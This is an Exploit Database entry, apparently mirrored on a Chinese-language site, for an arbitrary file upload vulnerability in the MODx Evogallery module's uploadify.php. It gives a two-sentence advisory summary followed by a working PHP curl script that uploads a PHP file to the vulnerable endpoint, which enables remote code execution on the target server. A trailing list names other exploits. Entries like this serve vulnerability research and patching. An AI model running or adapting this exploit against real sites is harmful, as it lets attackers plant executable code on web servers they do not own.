MODx Evogallery Module – ‘Uploadify.php’ Arbitrary File Upload

Exploit Database
14 阅读

作者： TUNISIAN CYBER

日期： 2014-02-18
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/39101/

source: https://www.securityfocus.com/bid/65646/info

MODx Evogallery module is prone to an arbitrary file upload vulnerability.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 

<?php
$uploadfile="file.php"; 
$ch = curl_init("demo.ltd/assets/modules/evogallery/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS, 
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

last Exploits
MODx Evogallery Module – ‘Uploadify.php’ Arbitrary File Upload的更多信息

Joomla! Component com_liveticker – Blind SQL Injection：
BOOKSolved 1.2.2 – Remote File Disclosure：
Online Library Management System 1.0 – Arbitrary File Upload Remote Code Execution (Unauthenticated)：
Sagem F@st 3304-V2 – Local File Inclusion：
WordPress Plugin Sexy Add Template – Cross-Site Request Forgery：
WordPress Plugin Wow Forms 2.1 – SQL Injection：
wityCMS 0.6.1 – Cross-Site Scripting：
Opencimetiere 2.01 – Multiple Remote File Inclusions：